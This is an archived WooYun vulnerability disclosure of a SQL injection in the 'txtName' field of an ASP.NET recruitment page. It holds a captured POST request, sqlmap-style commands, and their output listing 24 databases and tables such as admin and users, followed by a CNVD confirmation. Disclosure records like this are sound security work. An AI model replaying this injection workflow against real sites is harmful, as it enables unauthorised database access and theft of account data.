乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-02: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
RT
POST /WebPage/index.aspx?menu=menu1 HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/WebPage/index.aspx?menu=menu1Cookie: ASP.NET_SessionId=bzriqxd1oowjiql3usqq3iijConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 3389__VIEWSTATE=%2FwEPDwULLTE3Mzc3NTUzNTEPZBYCAgEPZBYMAgEPZBYCAgUPFgIeB1Zpc2libGVoZAIDDxAPFgYeDURhdGFUZXh0RmllbGQFBE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQROYW1lHgtfIURhdGFCb3VuZGdkEBUKD%2BmrmOmYtueuoeeQhuexuw%2FluILlnLrokKXplIDnsbsP6IGM6IO9566h55CG57G7D%2BeUn%2BS6p%2BeuoeeQhuexuw%2Flt6XoibrmioDmnK%2FnsbsP6K6%2B6K6h56CU5Y%2BR57G7D%2BS%2FoeaBr%2BaKgOacr%2Bexuw%2FnlLXlrZDllYbliqHnsbsP6LSo6YeP566h55CG57G7Feivt%2BmAieaLqeiBjOS9jeexu%2BWIqxUKD%2BmrmOmYtueuoeeQhuexuw%2FluILlnLrokKXplIDnsbsP6IGM6IO9566h55CG57G7D%2BeUn%2BS6p%2BeuoeeQhuexuw%2Flt6XoibrmioDmnK%2FnsbsP6K6%2B6K6h56CU5Y%2BR57G7D%2BS%2FoeaBr%2BaKgOacr%2Bexuw%2FnlLXlrZDllYbliqHnsbsP6LSo6YeP566h55CG57G7ABQrAwpnZ2dnZ2dnZ2dnZGQCBQ8QDxYGHwEFCVdvcmtQbGFjZR8CBQlXb3JrUGxhY2UfA2dkEBUHCeeZveS6keWMugblub%2Flt54J5bm%2F5bee5biCCea4hei%2FnOW4ggnml6DplKHluIIJ5q2m5rGJ5biCDOmAieaLqeWfjuW4ghUHCeeZveS6keWMugblub%2Flt54J5bm%2F5bee5biCCea4hei%2FnOW4ggnml6DplKHluIIJ5q2m5rGJ5biCABQrAwdnZ2dnZ2dnZGQCDQ8WAh4LXyFJdGVtQ291bnQCBhYMZg9kFgJmDxUDAjUzDOaLm%2BWVhuS4k%2BWRmAblub%2Flt55kAgEPZBYCZg8VAwI1MhXmoLflk4Hop4TliJLorr7orqHluIgJ55m95LqR5Yy6ZAICD2QWAmYPFQMCNTEJ5a6h5Lu35ZGYCeeZveS6keWMumQCAw9kFgJmDxUDAjUwEua0u%2BWKqOaOqOW5v%2Be7j%2BeQhgnlub%2Flt57luIJkAgQPZBYCZg8VAwI0OQ%2FlsZXnpLrorr7orqHluIgJ5bm%2F5bee5biCZAIFD2QWAmYPFQMCNDgV5q2m5rGJ6K6%2B5aSH5bel56iL5biICeatpuaxieW4gmQCDw8WAh8EAgkWEmYPZBYCZg8VAw9pbWFnZXMvc3UwOS5wbmcP6auY6Zi2566h55CG57G7D%2BmrmOmYtueuoeeQhuexu2QCAQ9kFgJmDxUDD2ltYWdlcy9zdTAyLnBuZw%2FluILlnLrokKXplIDnsbsP5biC5Zy66JCl6ZSA57G7ZAICD2QWAmYPFQMPaW1hZ2VzL3N1MDQucG5nD%2BiBjOiDveeuoeeQhuexuw%2FogYzog73nrqHnkIbnsbtkAgMPZBYCZg8VAw9pbWFnZXMvc3UwNy5wbmcP55Sf5Lqn566h55CG57G7D%2BeUn%2BS6p%2BeuoeeQhuexu2QCBA9kFgJmDxUDD2ltYWdlcy9zdTA4LnBuZw%2Flt6XoibrmioDmnK%2FnsbsP5bel6Im65oqA5pyv57G7ZAIFD2QWAmYPFQMPaW1hZ2VzL3N1MDYucG5nD%2BiuvuiuoeeglOWPkeexuw%2Forr7orqHnoJTlj5HnsbtkAgYPZBYCZg8VAw9pbWFnZXMvc3UwMy5wbmcP5L%2Bh5oGv5oqA5pyv57G7D%2BS%2FoeaBr%2BaKgOacr%2Bexu2QCBw9kFgJmDxUDD2ltYWdlcy9zdTA1LnBuZw%2FnlLXlrZDllYbliqHnsbsP55S15a2Q5ZWG5Yqh57G7ZAIID2QWAmYPFQMPaW1hZ2VzL3N1MDEucG5nD%2Bi0qOmHj%2BeuoeeQhuexuw%2FotKjph4%2FnrqHnkIbnsbtkAhEPFgIfBAIFFgpmD2QWAmYPFQMDMTQ0POasp%2Ba0vuWGjea3u%2BauiuiNo%2B%2B8jOiNo%2BiOt%2BKAnOS4reWbveWutuWxhe%2B8iOijhemlsOeVjO%2B8iS4uLgoyMDE1LTEyLTAzZAIBD2QWAmYPFQMDMTQzPOS4gOW6p%2BWfjui2hei2iuS4gOS4quWbve%2B8jOasp%2Ba0vuWMl%2BS6rOWIhuWFrOWPuOS4mue7qeegtC4uLgoyMDE1LTExLTMwZAICD2QWAmYPFQMCOTg55qyn5rS%2B5aSn5a625bGF5LiA54Ku6ICM57qi77yM5Y%2BR5bGV5Y%2BM6amx5Yqo5Yq%2F5LiN5Y%2Bv5oyhCjIwMTUtMTAtMTNkAgMPZBYCZg8VAwI5NzrmrKfmtL465Lit5Zu95aKZ57q45aKZ5biD6KGM5Lia5Y2B5aSn56eR5oqA5Yib5paw5Zu95a62Li4uCjIwMTUtMTAtMTNkAgQPZBYCZg8VAwI5OTbmr48xOOWwj%2BaXtuivnueUnzHlrrbpl6jlupfvvIHmrKfmtL7ooaPmn5zlhajlsYvlrpouLi4KMjAxNS0xMC0xMmRk90GDsknAM5BsAJHQ4Wbpxt%2B9VM7q3RvXldktMZQWdoQ%3D&__VIEWSTATEGENERATOR=0E6ECABE&__EVENTVALIDATION=%2FwEdABauezuhvMwHfAx0gKbQGkRRaetTzx4Eqm%2FnW2S3CtDUUdog5wAzIL1VHdmjsKEMOHRczdreINUbf4yxOolNOzhbJLG6K4BgUAOBxbrlG83Z3iC9kp%2FafeVuR5n0xL1NEUc%2FTvP4BzRaqCWBQciRos0CVDYb%2BukiJFUCOsq3RA5HB1BkmZpkGNm45dLtdxRIFP2FE67U4M81keTwHWm94gm%2FectMBzCyCfGzkcen5%2F2i7nVzM%2Fi0jOf7P87DNdVxr%2B0qY1QzpnqmEH5z8Bd1evAq6pztVnkeGCoWtE70U%2B3I4nqAmwfbk1dyUhFAuyhfk1NTi4tr3KMw7Y%2B0WwDMdpoWUvYr79k2J1YqW7zHPD7pTZuTXwDGinyP2ZC%2BeiSNUTEjD5q%2Bp%2FdfoLyDT6T%2FO1E7ozoJZpuXxkpOVJKRbHyuHj9YyyR4qjX0bKJ2X6bXV1PN%2BDvxnwFeFeJ9MIBWR693R0l9yvmLjn0tQ3kSHSrnxTifVkN9rTmuwCq9833rvzQ%3D&Head1%24hidMenu=menu1&ddlType=&ddlWorkPlace=&txtName=%25&Button2=-r f:\k.txt -p txtNameweb server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008-r f:\k.txt --dbsavailable databases [24]:[*] Lottery20y[*] lotteryoppeinc[*] master[*] MemberLottery[*] model[*] msdb[*] ocmap_zs[*] OpDesign[*] OpGrandPrix2011[*] OppeinData[*] OppeinGeneral[*] OppeinPoint2012[*] OpRecruitment[*] Optima2009[*] OptimaBBS2009[*] OptimaLottery[*] optimavoteweb[*] OpWYDesign[*] OPZPWeb[*] PonderWAF[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] vote-r f:\k.txt --tablesCurrent database[5 tables]+--------------------+| dbo.admin || dbo.news || dbo.sysconstraints || dbo.sysusers || dbo.users |+--------------------+
修复
危害等级:中
漏洞Rank:10
确认时间:2016-01-08 21:12
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无